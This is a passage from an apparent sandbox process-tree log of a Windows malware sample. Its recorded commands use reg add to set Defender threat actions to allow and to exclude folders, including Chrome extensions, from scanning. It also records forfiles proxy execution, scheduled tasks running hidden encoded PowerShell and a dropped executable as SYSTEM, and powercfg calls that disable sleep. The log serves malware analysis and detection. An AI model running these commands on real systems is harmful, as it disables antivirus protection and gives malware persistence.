powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵PID:4660
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵PID:4672
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵PID:4880
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:4876
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵PID:1080
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵PID:2992
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:220
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵PID:320
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵PID:1384
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:4400
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵PID:4624
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵PID:3344
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:4680
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:4020
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵PID:4708
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
PID:3748 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵PID:5040
-
-
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵PID:568
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:3524
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:5004
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:1912
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:4540
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:792
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:3192
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:5072
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:1080
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:4060
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:2120
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:1888
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:5068
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:4524
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:2860
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:3012
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:3840
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:1164
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:352
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:3540
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:1040
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:904
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:1872
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:316
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:2216
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:2924
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:3524
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:5084
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:1524
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:3896
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YrgxaRmWgsNWPaiiAzR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YrgxaRmWgsNWPaiiAzR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hkBthRLftwjEC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hkBthRLftwjEC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oGdIbQIKIHUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oGdIbQIKIHUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\prAQyJMeU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\prAQyJMeU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zNBDoCPwUgCU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zNBDoCPwUgCU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wpmocubwzvTKZWVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wpmocubwzvTKZWVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\HKomOEKiubDeyUja\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\HKomOEKiubDeyUja\" /t REG_DWORD /d 0 /reg:64;"2⤵PID:308
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YrgxaRmWgsNWPaiiAzR" /t REG_DWORD /d 0 /reg:323⤵PID:2816
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YrgxaRmWgsNWPaiiAzR" /t REG_DWORD /d 0 /reg:324⤵PID:4384
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YrgxaRmWgsNWPaiiAzR" /t REG_DWORD /d 0 /reg:643⤵PID:3888
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hkBthRLftwjEC" /t REG_DWORD /d 0 /reg:323⤵PID:4324
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hkBthRLftwjEC" /t REG_DWORD /d 0 /reg:643⤵PID:2200
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oGdIbQIKIHUn" /t REG_DWORD /d 0 /reg:323⤵PID:4680
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oGdIbQIKIHUn" /t REG_DWORD /d 0 /reg:643⤵PID:1928
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\prAQyJMeU" /t REG_DWORD /d 0 /reg:323⤵PID:3148
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\prAQyJMeU" /t REG_DWORD /d 0 /reg:643⤵PID:5116
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zNBDoCPwUgCU2" /t REG_DWORD /d 0 /reg:323⤵PID:232
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zNBDoCPwUgCU2" /t REG_DWORD /d 0 /reg:643⤵PID:3700
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wpmocubwzvTKZWVB /t REG_DWORD /d 0 /reg:323⤵PID:2928
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wpmocubwzvTKZWVB /t REG_DWORD /d 0 /reg:643⤵PID:2924
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:3524
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:5084
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz /t REG_DWORD /d 0 /reg:323⤵PID:1524
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz /t REG_DWORD /d 0 /reg:643⤵PID:3408
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\HKomOEKiubDeyUja /t REG_DWORD /d 0 /reg:323⤵PID:4292
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\HKomOEKiubDeyUja /t REG_DWORD /d 0 /reg:643⤵PID:4876
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gJrqVsjoL" /SC once /ST 02:03:17 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:4336 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4360
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gJrqVsjoL"2⤵PID:2828
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gJrqVsjoL"2⤵PID:932
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "emrEEeoVdUigmulhl" /SC once /ST 01:41:37 /RU "SYSTEM" /TR "\"C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\dLttyhs.exe\" 4u /IahIdidcc 525403 /S" /V1 /F2⤵
- Creates scheduled task(s)
PID:1048
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "emrEEeoVdUigmulhl"2⤵PID:4336
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2508 -s 8962⤵
- Program crash
PID:196
-
-
C:\ProgramData\qhbnnmvggfhr\bkqtzupkspiy.exeC:\ProgramData\qhbnnmvggfhr\bkqtzupkspiy.exe1⤵PID:320
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵PID:4932
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵PID:3536
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵PID:3148
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵PID:1600
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:4388
-
-
C:\Windows\system32\svchost.exesvchost.exe2⤵PID:4288
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:3692
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Command and Scripting Interpreter: PowerShell
PID:604 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4172
-
-
C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\dLttyhs.exeC:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\dLttyhs.exe 4u /IahIdidcc 525403 /S1⤵PID:1372
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵PID:4932
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵PID:3580
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵PID:2996
-
